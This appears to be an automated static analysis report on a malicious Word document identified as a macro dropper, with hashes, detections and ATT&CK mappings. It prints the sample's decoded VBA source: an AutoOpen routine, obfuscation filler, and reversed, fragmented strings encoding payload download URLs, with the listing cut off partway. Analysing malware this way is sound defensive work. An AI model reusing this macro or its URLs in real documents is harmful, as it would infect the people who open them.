Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4b4fbf3de37b71b5…

MALICIOUS

Office (OLE)

134.5 KB · Created: 2018-04-30 12:41:00 · Authoring application: Microsoft Office Word · First seen: 2019-05-16
MD5: 621b8cdd17688f2ed0eb8f985f9463a6 SHA-1: d5fa8a2854e16f3b5663ec5adc1225a4408679c3 SHA-256: 4b4fbf3de37b71b5a81da84da06a2264dfec57b849e6f4ac5cb55197a05c540b
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic · T1204.002 Malicious File · T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, including an AutoOpen macro and a Shell() call. The presence of these elements strongly suggests the document is designed to execute arbitrary code, likely downloading and running a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6524863-0' further supports this dropper functionality.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6524863-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6524863-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it is not a downloader or parser-CVE attribution.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 139070 bytes
SHA-256: 0eb6ab382236b6fc4fb18a245247c66e7a9b1127d534c833cb5e03f6bcd7bf90
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "RLfodKHatPiiV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module attributes as exported by olevba for the first recovered module. The module name
' is a random-looking identifier; VB_Base = "1Normal.ThisDocument" together with
' VB_PredeclaredId = True suggests this is the document's own class module (ThisDocument),
' which is where Word looks for the Autoopen entry point defined below — confirm against
' the full macros.bas, as this preview is truncated.
' Filler routine: the parameter vktUrd is never used, the selector jFwlsm is not assigned
' anywhere in the visible listing, and the values computed in each Case are never read.
' iqOLS is not called from any routine in this excerpt (the listing is truncated).
Sub iqOLS(vktUrd)
' With no Option Explicit in view, an unassigned selector evaluates as Empty, so neither
' Case matches and the block is a no-op — treat it as obfuscation padding, not logic.
Select Case jFwlsm
         Case 92841
            EhuqN = CByte(kEkBcF * 42643)
         Case 12303
            wvHwTu = Oct(77992 - Int(1466) - 45512 * SBczww)
End Select
End Sub
' Filler routine built from three copies of the same Select Case pattern. FPKfJ is unused,
' none of the selectors (PXXdR, YLwGMP, OaOEh) is assigned in the visible listing, and
' JmdIT is not referenced by any visible routine.
Sub JmdIT(FPKfJ)
' Each block below: an Empty selector matches no numeric Case, so nothing executes.
Select Case PXXdR
         Case 2612
            lncdPh = CByte(BudIE * 77183)
         Case 5334
            vjcfd = Oct(50516 - Int(3014) - 68510 * OfhIR)
End Select
Select Case YLwGMP
         Case 63284
            ObvUL = CByte(CaVQqb * 76011)
         Case 1740
            XPjEUO = Oct(69833 - Int(99825) - 29260 * zFzGhp)
End Select
Select Case OaOEh
         Case 11436
            wFnKQR = CByte(HXYarc * 21261)
         Case 24177
            dbjkLj = Oct(10614 - Int(38410) - 76387 * fMNmiq)
End Select
End Sub
' Filler routine (same no-op Select Case pattern as iqOLS/JmdIT). zurhYj is unused, the
' selectors NzCfkc and FpnOo are never assigned in the visible listing, and tFObZ is not
' called from any visible routine.
Sub tFObZ(zurhYj)
Select Case NzCfkc
         Case 1659
            iRATW = CByte(mcukqk * 65143)
         Case 67984
            wTDrj = Oct(80224 - Int(38859) - 97608 * nzNjKh)
End Select
Select Case FpnOo
         Case 26722
            DuLRz = CByte(hwIduE * 23883)
         Case 61907
            RfKSTf = Oct(47781 - Int(52857) - 11183 * Milvu)
End Select
End Sub
' Word auto-execution entry point (this is what the OLE_VBA_AUTOOPEN heuristic matched):
' Word runs it when the document is opened and macros are enabled. The two Select Case
' blocks are the same no-op filler used throughout this module; the single real
' statement is the call between them.
Sub Autoopen()
' Suppress all runtime errors so that a failing step does not surface a dialog to the user
' and does not stop the rest of the routine.
On Error Resume Next
Select Case QkLAz
         Case 46607
            XBzrp = CByte(mGVWUX * 14994)
         Case 8632
            ubiSF = Oct(98587 - Int(69650) - 28226 * BNJdTA)
End Select
' Calls mrMwFIRnwwmYmb with ntHnRT + UvQizJMohMOXdK + jrTMrL. UvQizJMohMOXdK is the Function
' in the second module of this excerpt that assembles strings via uFIWou() from '+'-joined,
' apparently reversed fragments. mrMwFIRnwwmYmb, ntHnRT and jrTMrL are not defined in the
' visible listing.
' NOTE(review): the Shell() call reported by OLE_VBA_SHELL is not in this excerpt; it
' presumably lives in mrMwFIRnwwmYmb or in the truncated tail — confirm against the full
' macros.bas before attributing the execution step to this line.
mrMwFIRnwwmYmb (ntHnRT + UvQizJMohMOXdK + jrTMrL)
Select Case XmPvp
         Case 68475
            iSYmn = CByte(qbaIm * 38839)
         Case 82346
            izREbn = Oct(91088 - Int(52867) - 72307 * sCidbt)
End Select
End Sub
' Filler routine: three no-op Select Case blocks on selectors (ZXUls, purPUi, QLTKhV) that are
' never assigned in the visible listing. dPwHQ is unused and iRJJaj is not called from any
' visible routine.
Sub iRJJaj(dPwHQ)
Select Case ZXUls
         Case 74002
            qOwaCh = CByte(ukZMzh * 50277)
         Case 15686
            hWEQQ = Oct(51202 - Int(22357) - 78413 * KaNUhs)
End Select
Select Case purPUi
         Case 12570
            zGtpmH = CByte(lRUnOo * 42134)
         Case 65533
            CHmsG = Oct(47279 - Int(48864) - 4772 * aKmish)
End Select
Select Case QLTKhV
         Case 5053
            bpvAui = CByte(TMbMNv * 27811)
         Case 73268
            jqJLw = Oct(92963 - Int(4805) - 48671 * owdCXj)
End Select
End Sub
' Filler routine: one no-op Select Case block (selector UCBZui is never assigned in the
' visible listing, CdraH is unused, and FGQRdZ is not referenced by any visible routine).
Sub FGQRdZ(CdraH)
Select Case UCBZui
         Case 81132
            rjfmW = CByte(FjTQp * 84905)
         Case 61022
            pzUvH = Oct(66807 - Int(13172) - 64148 * VvtSm)
End Select
End Sub

Attribute VB_Name = "EItsUNWlfHLCWJ"
' Second module recovered by olevba. It holds another filler Sub and the Function
' UvQizJMohMOXdK that Autoopen in the first module references; that Function starts in this
' excerpt but is cut off by the preview truncation.
' Filler routine in the second module: same no-op Select Case pattern as the first module.
' wWHFK is unused, JrcvTj is never assigned in the visible listing, and lPzMND is not called
' from any visible routine.
Sub lPzMND(wWHFK)
Select Case JrcvTj
         Case 30540
            vzLuS = CByte(oovfk * 45001)
         Case 58110
            ftGYsz = Oct(19960 - Int(44066) - 71976 * Dsbni)
End Select
End Sub
Function UvQizJMohMOXdK()
On Error Resume Next
Select Case rziJi
         Case 70332
            SGQWl = CByte(laTazz * 51898)
         Case 97777
            JUkiU = Oct(83747 - Int(23099) - 33923 * XIVXT)
End Select
KzWFC = uFIWou("Cwr'@/'+'il'+'k'+'b'+'/moc.t'+'ranairanul//:ptth@/Fb'+'U3'+'NN/ten.ss'+'enr'+'eggit'+'/'+'/'+':ptth@'+'/'+'V'+'7'+'AkU/ua.'+'m'+'ocQY AH", 61634 - 61634 + 6 + 61634 - 61634, 61634 - 61634 + 128 + 61634 - 61634)
Select Case XjwQUu
         Case 50895
            RRnhG = CByte(fpLPT * 78038)
         Case 19749
            wPZGo = Oct(86375 - Int(97127) - 56715 * NGjDP)
End Select
Select Case ZfqHA
         Case 52682
            dhqHs = CByte(wMzmZ * 65529)
         Case 42563
            FldRa = Oct(60579 - Int(33019) - 40089 * XmpwC)
End Select
ANrvFMaZ = uFIWou("RP4.namseda'+'rtaerih'+'/'+'/:ptth@/'+'SbTF5R/moc.lletrFvkjKj", 98192 - 98192 + 7 + 98192 - 98192, 98192 - 98192 + 52 + 98192 - 98192)
Select Case OVPsBt
         Case 38139
            WVrlW = CByte(qSMzt * 38788)
         Case 87949
            pZvwI = Oct(19379 - Int(36643) - 39947 * TwhiQ)
End Select
Select Case Hbrup
         Case 78888
            O
... (truncated)